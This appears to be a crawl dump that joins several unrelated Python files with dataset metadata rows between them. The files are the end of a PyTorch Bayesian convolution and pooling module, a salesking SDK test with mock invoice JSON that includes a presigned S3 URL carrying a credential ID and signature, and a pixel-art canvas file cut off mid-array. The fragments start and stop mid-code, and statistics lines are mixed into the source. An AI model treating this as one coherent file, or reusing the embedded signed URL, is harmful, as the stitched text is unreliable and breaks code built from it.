z_var = x_var * (mu * standard_gaussian(mu) + (
1 + mu ** 2) * gaussian_cdf(mu))
return z_mean, z_var
else:
return x
def _zero_mean_forward(self, x):
if self.certain or not self.deterministic:
x_mean = x if not isinstance(x, tuple) else x[0]
x_var = x_mean * x_mean
else:
x_mean = x[0]
x_var = x[1]
W_var = torch.exp(self.log_alpha) * self.weight * self.weight
z_mean = F.conv2d(x_mean, torch.zeros_like(self.weight), self.bias,
self.stride,
self.padding)
z_var = F.conv2d(x_var, W_var, bias=None, stride=self.stride,
padding=self.padding)
if self.deterministic:
return z_mean, z_var
else:
dst = Independent(Normal(z_mean, z_var), 1)
sample = dst.rsample()
return sample, None
def _mean_forward(self, x):
if not isinstance(x, tuple):
x_mean = x
else:
x_mean = x[0]
z_mean = F.conv2d(x_mean, self.weight, self.bias,
self.stride,
self.padding)
return z_mean, None
def _det_forward(self, x):
if self.certain and isinstance(x, tuple):
x_mean = x[0]
x_var = x_mean * x_mean
elif not self.certain:
x_mean = x[0]
x_var = x[1]
else:
x_mean = x
x_var = x_mean * x_mean
W_var = torch.exp(self.log_alpha) * self.weight * self.weight
z_mean = F.conv2d(x_mean, self.weight, self.bias.flatten(),
self.stride,
self.padding)
z_var = F.conv2d(x_var, W_var, bias=None, stride=self.stride,
padding=self.padding)
return z_mean, z_var
def _mcvi_forward(self, x):
if isinstance(x, tuple):
x_mean = x[0]
x_var = x[1]
else:
x_mean = x
x_var = x_mean * x_mean
if self.zero_mean:
lrt_mean = self.op_bias(x_mean, 0.0 * self.weight)
else:
lrt_mean = self.op_bias(x_mean, self.weight)
sigma2 = torch.exp(self.log_alpha) * self.weight * self.weight
if self.permute_sigma:
sigma2 = sigma2.view(-1)[
torch.randperm(self.weight.nelement()).cuda()].view(
self.weight.shape)
lrt_std = torch.sqrt(1e-16 + self.op_nobias(x_var, sigma2))
if self.training:
eps = lrt_std.data.new(lrt_std.size()).normal_()
else:
eps = 0.0
return lrt_mean + lrt_std * eps, None
def compute_kl(self):
return self.weight.nelement() / self.log_alpha.nelement() * kl_loguni(
self.log_alpha)
def __repr__(self):
s = ('{name}({in_channels}, {out_channels}, kernel_size={kernel_size}'
', stride={stride}')
s += ', padding={padding}'
s += ', alpha_shape=' + str(self.alpha_shape)
s += ', prior=' + self.prior
s += ', dilation={dilation}'
if self.bias is None:
s += ', bias=False'
s += ')'
return s.format(name=self.__class__.__name__, **self.__dict__)
def set_flag(self, flag_name, value):
setattr(self, flag_name, value)
for m in self.children():
if hasattr(m, 'set_flag'):
m.set_flag(flag_name, value)
class AveragePoolGaussian(nn.Module):
def __init__(self, kernel_size, stride=None, padding=0):
super().__init__()
if not isinstance(kernel_size, tuple):
kernel_size = (kernel_size, kernel_size)
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
def forward(self, x):
if not isinstance(x, tuple):
raise ValueError(
"Input for pooling layer should be tuple of tensors")
x_mean, x_var = x
z_mean = F.avg_pool2d(x_mean, self.kernel_size, self.stride,
self.padding)
if x_var is None:
z_var = None
else:
n = self.kernel_size[0] * self.kernel_size[1]
z_var = F.avg_pool2d(x_var, self.kernel_size, self.stride,
self.padding) / n
return z_mean, z_var
def __repr__(self):
return self.__class__.__name__ + '(' \
+ 'kernel_size= ' + str(self.kernel_size) \
+ ', stride=' + str(self.stride) \
+ ', padding=' + str(self.padding) + ')'
def set_flag(self, flag_name, value):
setattr(self, flag_name, value)
for m in self.children():
if hasattr(m, 'set_flag'):
m.set_flag(flag_name, value)
| 33.238095 | 83 | 0.558544 | 3,950 | 30,712 | 4.052152 | 0.052658 | 0.032488 | 0.023616 | 0.008747 | 0.857241 | 0.846745 | 0.830126 | 0.784706 | 0.774522 | 0.746158 | 0 | 0.007592 | 0.34384 | 30,712 | 923 | 84 | 33.274106 | 0.786671 | 0.035296 | 0 | 0.808392 | 0 | 0 | 0.016915 | 0.001566 | 0 | 0 | 0 | 0 | 0 | 1 | 0.100699 | false | 0 | 0.008392 | 0.01958 | 0.227972 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d8ca759ad556b688453777f77bef5e159c1ecb01 | 22,400 | py | Python | salesking/tests/test_invoice_mock.py | salesking/salesking_python_sdk | 0d5a95c5ee4e16a85562ceaf67bb11b55e47ee4c | [
"Apache-2.0"
] | null | null | null | salesking/tests/test_invoice_mock.py | salesking/salesking_python_sdk | 0d5a95c5ee4e16a85562ceaf67bb11b55e47ee4c | [
"Apache-2.0"
] | 5 | 2015-01-21T09:23:06.000Z | 2015-02-01T18:44:22.000Z | salesking/tests/test_invoice_mock.py | salesking/salesking_python_sdk | 0d5a95c5ee4e16a85562ceaf67bb11b55e47ee4c | [
"Apache-2.0"
] | null | null | null | from salesking.tests.base import SalesKingBaseTestCase
from salesking import api, resources
class MockInvoiceResponse(object):
def __init__(self):
self.status_code = 200
self.content = u'''
{"invoice":
{"id":"bUAr_Qlb4r4BelabxfpGMl","number":"R-069-2011-215a","address_field":"Werbeagentur Gl\u00fcck\nKleeweg 4\n30001 Berlin","date":"2011-12-21","due_days":3,"due_date":"2011-12-24","status":"closed","external_ref":null,"payment_method":null,"title":"Projekt Tippspiel","notes_before":"Wir m\u00f6chten Ihnen folgende Positionen in Rechnung stellen:","notes_after":"Bitte \u00fcberweisen Sie den Rechnungsbetrag bis zum 24.12.2011.","tag_list":"!example","language":null,"currency":"EUR","exchange_rate":null,"gross_total_exchanged":1950.0,"archived_pdf":
{"attachment":{"id":"bVKYQ-lb4r4BelabxfpGMl","filename":"just_a_test.pdf","disk_filename":"111221215503038_just_a_test.pdf","url":"https://sk2-dev.s3.amazonaws.com/cPUdkOlb0r4BelabxfpGMl/attachments/Document/111221215503038_just_a_test.pdf?X-Amz-Expires=1200&X-Amz-Date=20150128T181758Z&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=134E61V8BNTFFTK4T982/20150128/us-east-1/s3/aws4_request&X-Amz-SignedHeaders=host&X-Amz-Signature=6bcef58961133d4e28963f9e0643751cdaaa6d5a57505c4dd00df69de8628cfe","related_object_type":"Document","related_object_id":"bUAr_Qlb4r4BelabxfpGMl","content_type":"application/pdf","size":32814,"is_signed":null,"created_at":"2011-12-21T22:55:03+01:00","team_id":null},"links":
[{"rel":"self","href":"attachments/bVKYQ-lb4r4BelabxfpGMl"},
{"rel":"download","href":"attachments/bVKYQ-lb4r4BelabxfpGMl/download"},
{"rel":"instances","href":"attachments"},
{"rel":"destroy","href":"attachments/bVKYQ-lb4r4BelabxfpGMl"}]
},"sepa_mandate_id":null,"sepa_mandate_signed_at":null,"sepa_debit_sequence_type":null,
"client":{"links":[
{"rel":"self","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"instances","href":"clients"},
{"rel":"destroy","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"update","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"create","href":"clients"},
{"rel":"documents","href":"clients/bUvvUglb4r4BelabxfpGMl/documents"},
{"rel":"attachments","href":"clients/bUvvUglb4r4BelabxfpGMl/attachments"},
{"rel":"invoices","href":"clients/bUvvUglb4r4BelabxfpGMl/invoices"},
{"rel":"estimates","href":"clients/bUvvUglb4r4BelabxfpGMl/estimates"},
{"rel":"orders","href":"clients/bUvvUglb4r4BelabxfpGMl/orders"},
{"rel":"credit_notes","href":"clients/bUvvUglb4r4BelabxfpGMl/credit_notes"},
{"rel":"recurrings","href":"clients/bUvvUglb4r4BelabxfpGMl/recurrings"},
{"rel":"payment_reminders","href":"clients/bUvvUglb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"clients/bUvvUglb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"clients/bUvvUglb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"clients/bUvvUglb4r4BelabxfpGMl/emails"}
],
"client":{
"id":"bUvvUglb4r4BelabxfpGMl","parent_id":null,
"type":"Client","is_employee":false,"number":"K-01012-728",
"organisation":"Werbeagentur Gl\u00fcck","last_name":"zu Fall","first_name":"Rainer",
"gender":"male",
"notes":null,"position":null,"title":null,"tax_number":null,"vat_number":null,"email":"","url":null,"birthday":null,
"tag_list":"!example","created_at":"2011-12-21T22:55:00+01:00","updated_at":"2012-02-02T20:07:36+01:00",
"language":null,"currency":"EUR","payment_method":null,"bank_name":null,"bank_number":null,"bank_account_number":null,
"bank_iban":null,"bank_swift":null,"bank_owner":null,"phone_fax":null,"phone_office":null,"phone_home":null,"phone_mobile":null,
"lock_version":1,"cash_discount":null,"due_days":null,
"address_field":"Werbeagentur Gl\u00fcck\nHerr Rainer zu Fall\nKleeweg 4\n30001 Berlin",
"addresses":[{"address":
{"id":"bUvub0lb4r4BelabxfpGMl","city":"Berlin","address1":"Kleeweg 4","address2":null,"pobox":"","zip":"30001",
"state":null,"country":null,"created_at":"2011-12-21T22:55:00+01:00","updated_at":"2011-12-21T22:55:00+01:00",
"address_type":null,"order":null,"lat":null,"long":null,"_destroy":false}
}],
"team_id":null,"lead_source":null,"lead_ref":null,"lead_date":null,"converted_at":null,
"sales_potential":null,"probability":null,"expected_revenue":null}},
"client_id":"bUvvUglb4r4BelabxfpGMl",
"contact":
{"contact":
{"id":"bUvvUglb4r4BelabxfpGMl","parent_id":null,"type":"Client","is_employee":false,"number":"K-01012-728","organisation":"Werbeagentur Gl\u00fcck","last_name":"zu Fall","first_name":"Rainer","gender":"male","notes":null,"position":null,"title":null,"tax_number":null,"vat_number":null,"email":"","url":null,"birthday":null,"tag_list":"!example","created_at":"2011-12-21T22:55:00+01:00","updated_at":"2012-02-02T20:07:36+01:00","language":null,"currency":"EUR","payment_method":null,"bank_name":null,"bank_number":null,"bank_account_number":null,"bank_iban":null,"bank_swift":null,"bank_owner":null,"phone_fax":null,"phone_office":null,"phone_home":null,"phone_mobile":null,"lock_version":1,"cash_discount":null,"due_days":null,"address_field":"Werbeagentur Gl\u00fcck\nHerr Rainer zu Fall\nKleeweg 4\n30001 Berlin","addresses":
[{"address":
{"id":"bUvub0lb4r4BelabxfpGMl","city":"Berlin","address1":"Kleeweg 4","address2":null,"pobox":"","zip":"30001","state":null,"country":null,"created_at":"2011-12-21T22:55:00+01:00","updated_at":"2011-12-21T22:55:00+01:00","address_type":null,"order":null,"lat":null,"long":null,"_destroy":false}}],
"team_id":null,"lead_source":null,"lead_ref":null,"lead_date":null,"converted_at":null,"sales_potential":null,"probability":null,"expected_revenue":null},
"links":[{"rel":"self","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"instances","href":"contacts"},
{"rel":"destroy","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"update","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"create","href":"contacts"},
{"rel":"documents","href":"contacts/bUvvUglb4r4BelabxfpGMl/documents"},
{"rel":"attachments","href":"contacts/bUvvUglb4r4BelabxfpGMl/attachments"},
{"rel":"invoices","href":"contacts/bUvvUglb4r4BelabxfpGMl/invoices"},
{"rel":"estimates","href":"contacts/bUvvUglb4r4BelabxfpGMl/estimates"},
{"rel":"orders","href":"contacts/bUvvUglb4r4BelabxfpGMl/orders"},
{"rel":"credit_notes","href":"contacts/bUvvUglb4r4BelabxfpGMl/credit_notes"},
{"rel":"recurrings","href":"contacts/bUvvUglb4r4BelabxfpGMl/recurrings"},
{"rel":"payment_reminders","href":"contacts/bUvvUglb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"contacts/bUvvUglb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"contacts/bUvvUglb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"contacts/bUvvUglb4r4BelabxfpGMl/emails"}]},
"contact_id":"bUvvUglb4r4BelabxfpGMl","team_id":null,
"line_items":[{"line_item":
{"id":"bUAl2ylb4r4BelabxfpGMl","position":1,"name":"Projektarbeit","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Tage","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}},
{"line_item":
{"id":"bUAnt0lb4r4BelabxfpGMl","position":2,"name":"Kaffee trinken","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Tassen","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}},
{"line_item":
{"id":"bUAoPMlb4r4BelabxfpGMl","position":3,"name":"Bugs Programmieren","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Stunden","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}
}],
"items":
[{"line_item":
{"id":"bUAl2ylb4r4BelabxfpGMl","position":4,"name":"Projektarbeit","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Tage","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}
},
{"line_item":
{"id":"bUAnt0lb4r4BelabxfpGMl","position":5,"name":"Kaffee trinken","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Tassen","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}},
{"line_item":
{"id":"bUAoPMlb4r4BelabxfpGMl","position":6,"name":"Bugs Programmieren","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Stunden","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}
}],
"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2013-01-23T09:56:46+01:00","lock_version":1,"price_total":1950.0,"price_tax":0.0,"gross_total":1950.0,"tax_total":0.0,"net_total":1950.0,"net_total_base":1950.0,"cost_total":0.0,"gross_margin_total":1950.0,"gross_margin_pct":100.0,"recurring_id":null},
"links":[{"rel":"self","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"instances","href":"invoices"},
{"rel":"destroy","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"update","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"create","href":"invoices"},
{"rel":"attachments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/attachments"},
{"rel":"payments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payments"},
{"rel":"payment_reminders","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/emails"},
{"rel":"payment create","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payments"},
{"rel":"print","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/print"}]
}
'''.replace(u"\n", u"").replace(u"\t", u"").replace(u" ", u"")
class MockInvoiceNoLineItemResponse(object):
def __init__(self):
self.status_code = 200
self.content = u'''
{"invoice":
{"id":"bUAr_Qlb4r4BelabxfpGMl","number":"R-069-2011-215","address_field":"Werbeagentur Gl\u00fcck\nKleeweg 4\n30001 Berlin","date":"2011-12-21","due_days":3,"due_date":"2011-12-24","status":"closed","external_ref":null,"payment_method":null,"title":"Projekt Tippspiel","notes_before":"Wir m\u00f6chten Ihnen folgende Positionen in Rechnung stellen:","notes_after":"Bitte \u00fcberweisen Sie den Rechnungsbetrag bis zum 24.12.2011.","tag_list":"!example","language":null,"currency":"EUR","exchange_rate":null,"gross_total_exchanged":1950.0,
"archived_pdf":
{"attachment":
{"id":"bVKYQ-lb4r4BelabxfpGMl","filename":"just_a_test.pdf","disk_filename":"111221215503038_just_a_test.pdf","url":"https://sk2-dev.s3.amazonaws.com/cPUdkOlb0r4BelabxfpGMl/attachments/Document/111221215503038_just_a_test.pdf?X-Amz-Expires=1200&X-Amz-Date=20150128T181758Z&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=134E61V8BNTFFTK4T982/20150128/us-east-1/s3/aws4_request&X-Amz-SignedHeaders=host&X-Amz-Signature=6bcef58961133d4e28963f9e0643751cdaaa6d5a57505c4dd00df69de8628cfe","related_object_type":"Document","related_object_id":"bUAr_Qlb4r4BelabxfpGMl","content_type":"application/pdf","size":32814,"is_signed":null,"created_at":"2011-12-21T22:55:03+01:00",
"team_id":null},
"links":
[{"rel":"self","href":"attachments/bVKYQ-lb4r4BelabxfpGMl"},
{"rel":"download","href":"attachments/bVKYQ-lb4r4BelabxfpGMl/download"},
{"rel":"instances","href":"attachments"},
{"rel":"destroy","href":"attachments/bVKYQ-lb4r4BelabxfpGMl"}]
},
"sepa_mandate_id":null,"sepa_mandate_signed_at":null,"sepa_debit_sequence_type":null,
"client":{"links":[
{"rel":"self","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"instances","href":"clients"},
{"rel":"destroy","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"update","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"create","href":"clients"},
{"rel":"documents","href":"clients/bUvvUglb4r4BelabxfpGMl/documents"},
{"rel":"attachments","href":"clients/bUvvUglb4r4BelabxfpGMl/attachments"},
{"rel":"invoices","href":"clients/bUvvUglb4r4BelabxfpGMl/invoices"},
{"rel":"estimates","href":"clients/bUvvUglb4r4BelabxfpGMl/estimates"},
{"rel":"orders","href":"clients/bUvvUglb4r4BelabxfpGMl/orders"},
{"rel":"credit_notes","href":"clients/bUvvUglb4r4BelabxfpGMl/credit_notes"},
{"rel":"recurrings","href":"clients/bUvvUglb4r4BelabxfpGMl/recurrings"},
{"rel":"payment_reminders","href":"clients/bUvvUglb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"clients/bUvvUglb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"clients/bUvvUglb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"clients/bUvvUglb4r4BelabxfpGMl/emails"}
],
"client":{
"id":"bUvvUglb4r4BelabxfpGMl","parent_id":null,
"type":"Client","is_employee":false,"number":"K-01012-728",
"organisation":"Werbeagentur Gl\u00fcck","last_name":"zu Fall","first_name":"Rainer",
"gender":"male",
"notes":null,"position":null,"title":null,"tax_number":null,"vat_number":null,"email":"","url":null,"birthday":null,
"tag_list":"!example","created_at":"2011-12-21T22:55:00+01:00","updated_at":"2012-02-02T20:07:36+01:00",
"language":null,"currency":"EUR","payment_method":null,"bank_name":null,"bank_number":null,"bank_account_number":null,
"bank_iban":null,"bank_swift":null,"bank_owner":null,"phone_fax":null,"phone_office":null,"phone_home":null,"phone_mobile":null,
"lock_version":1,"cash_discount":null,"due_days":null,
"address_field":"Werbeagentur Gl\u00fcck\nHerr Rainer zu Fall\nKleeweg 4\n30001 Berlin",
"addresses":[{"address":
{"id":"bUvub0lb4r4BelabxfpGMl","city":"Berlin","address1":"Kleeweg 4","address2":null,"pobox":"","zip":"30001",
"state":null,"country":null,"created_at":"2011-12-21T22:55:00+01:00","updated_at":"2011-12-21T22:55:00+01:00",
"address_type":null,"order":null,"lat":null,"long":null,"_destroy":false}
}],
"team_id":null,"lead_source":null,"lead_ref":null,"lead_date":null,"converted_at":null,
"sales_potential":null,"probability":null,"expected_revenue":null}},
"client_id":"bUvvUglb4r4BelabxfpGMl",
"contact":
{"contact":
{"id":"bUvvUglb4r4BelabxfpGMl","parent_id":null,"type":"Client","is_employee":false,"number":"K-01012-728","organisation":"Werbeagentur Gl\u00fcck","last_name":"zu Fall","first_name":"Rainer","gender":"male","notes":null,"position":null,"title":null,"tax_number":null,"vat_number":null,"email":"","url":null,"birthday":null,"tag_list":"!example","created_at":"2011-12-21T22:55:00+01:00","updated_at":"2012-02-02T20:07:36+01:00","language":null,"currency":"EUR","payment_method":null,"bank_name":null,"bank_number":null,"bank_account_number":null,"bank_iban":null,"bank_swift":null,"bank_owner":null,"phone_fax":null,"phone_office":null,"phone_home":null,"phone_mobile":null,"lock_version":1,"cash_discount":null,"due_days":null,"address_field":"Werbeagentur Gl\u00fcck\nHerr Rainer zu Fall\nKleeweg 4\n30001 Berlin","addresses":
[{"address":
{"id":"bUvub0lb4r4BelabxfpGMl","city":"Berlin","address1":"Kleeweg 4","address2":null,"pobox":"","zip":"30001","state":null,"country":null,"created_at":"2011-12-21T22:55:00+01:00","updated_at":"2011-12-21T22:55:00+01:00","address_type":null,"order":null,"lat":null,"long":null,"_destroy":false}}],
"team_id":null,"lead_source":null,"lead_ref":null,"lead_date":null,"converted_at":null,"sales_potential":null,"probability":null,"expected_revenue":null},
"links":[{"rel":"self","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"instances","href":"contacts"},
{"rel":"destroy","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"update","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"create","href":"contacts"},
{"rel":"documents","href":"contacts/bUvvUglb4r4BelabxfpGMl/documents"},
{"rel":"attachments","href":"contacts/bUvvUglb4r4BelabxfpGMl/attachments"},
{"rel":"invoices","href":"contacts/bUvvUglb4r4BelabxfpGMl/invoices"},
{"rel":"estimates","href":"contacts/bUvvUglb4r4BelabxfpGMl/estimates"},
{"rel":"orders","href":"contacts/bUvvUglb4r4BelabxfpGMl/orders"},
{"rel":"credit_notes","href":"contacts/bUvvUglb4r4BelabxfpGMl/credit_notes"},
{"rel":"recurrings","href":"contacts/bUvvUglb4r4BelabxfpGMl/recurrings"},
{"rel":"payment_reminders","href":"contacts/bUvvUglb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"contacts/bUvvUglb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"contacts/bUvvUglb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"contacts/bUvvUglb4r4BelabxfpGMl/emails"}]},
"contact_id":"bUvvUglb4r4BelabxfpGMl","team_id":null,
"line_items":[],
"items":[],
"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2013-01-23T09:56:46+01:00","lock_version":1,"price_total":1950.0,"price_tax":0.0,"gross_total":1950.0,"tax_total":0.0,"net_total":1950.0,"net_total_base":1950.0,"cost_total":0.0,"gross_margin_total":1950.0,"gross_margin_pct":100.0,"recurring_id":null},
"links":[{"rel":"self","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"instances","href":"invoices"},
{"rel":"destroy","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"update","href":"invoices/bUAr_Qlb4r4BelabxfpGMl"},
{"rel":"create","href":"invoices"},
{"rel":"attachments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/attachments"},
{"rel":"payments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payments"},
{"rel":"payment_reminders","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/emails"},
{"rel":"payment create","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/payments"},
{"rel":"print","href":"invoices/bUAr_Qlb4r4BelabxfpGMl/print"}]
}
'''.replace(u"\n", u"").replace(u"\t", u"").replace(u" ", u"")
class InvoiceWithDocumentAttachmentTestCase(SalesKingBaseTestCase):
def test_invoice_noLineitem_instaciated_mock_success(self):
clnt = api.APIClient()
klass = resources.get_model_class("invoice", api=clnt)
invoice = klass()
response = MockInvoiceNoLineItemResponse()
obj = invoice.to_instance(response)
self.assertIsNotNone(obj)
self.assertEqual(obj.number, "R-069-2011-215")
def test_invoice_instaciated_mock_fails(self):
clnt = api.APIClient()
klass = resources.get_model_class("invoice", api=clnt)
invoice = klass()
response = MockInvoiceResponse()
obj = invoice.to_instance(response)
self.assertEqual(obj.number, "R-069-2011-215a")
self.assertEqual(obj['client']['client']['number'], "K-01012-728")
| 99.115044 | 840 | 0.645848 | 2,565 | 22,400 | 5.469006 | 0.112671 | 0.009695 | 0.015968 | 0.025948 | 0.971985 | 0.970987 | 0.96065 | 0.956088 | 0.956088 | 0.956088 | 0 | 0.082624 | 0.150625 | 22,400 | 225 | 841 | 99.555556 | 0.654683 | 0 | 0 | 0.825688 | 0 | 0.155963 | 0.945982 | 0.699866 | 0 | 0 | 0 | 0 | 0.018349 | 1 | 0.018349 | false | 0 | 0.009174 | 0 | 0.041284 | 0.009174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
994a5838960c3de51feab43a751b8a1c8f1f8de3 | 12,507 | py | Python | function/subject.py | Jianghuchengphilip/Master-art-punk | 4102d82148bf571e0cd418e363c51fa8486c5a43 | [
"Apache-2.0"
] | 37 | 2022-01-12T07:07:59.000Z | 2022-03-31T10:25:46.000Z | function/subject.py | Jianghuchengphilip/Master-art-punk | 4102d82148bf571e0cd418e363c51fa8486c5a43 | [
"Apache-2.0"
] | 1 | 2022-01-25T12:24:57.000Z | 2022-02-03T10:45:00.000Z | function/subject.py | Jianghuchengphilip/Master-art-punk | 4102d82148bf571e0cd418e363c51fa8486c5a43 | [
"Apache-2.0"
] | 10 | 2022-01-12T07:29:37.000Z | 2022-03-28T23:37:42.000Z | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""=================================================
@Author :蒋虎成
@Date :2021/9/22 17:05
@Desc :绘图元素
=================================================="""
# 设置24*24的画布
canvas = {
'colors': [0],
'data': [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
